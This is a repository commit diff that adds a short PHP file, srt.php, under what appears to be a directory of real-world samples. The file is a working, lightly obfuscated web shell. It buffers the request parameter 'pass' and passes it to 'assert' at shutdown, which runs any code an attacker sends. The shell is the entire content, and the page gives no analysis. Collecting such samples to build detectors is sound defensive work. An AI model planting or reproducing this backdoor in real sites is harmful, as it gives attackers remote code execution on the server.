summaryrefslogtreecommitdiff
path: root/data/samples/real/srt.php
diff options
context:
space:
mode:
Diffstat (limited to 'data/samples/real/srt.php')
-rw-r--r--data/samples/real/srt.php5
1 files changed, 5 insertions, 0 deletions
diff --git a/data/samples/real/srt.php b/data/samples/real/srt.php
new file mode 100644
index 0000000..ef02af2
--- /dev/null
+++ b/data/samples/real/srt.php
@@ -0,0 +1,5 @@
1<?php
2ob_start(function ($c,$d){register_shutdown_function('assert',$c);});
3echo $_REQUEST['pass'];
4ob_end_flush();
5?>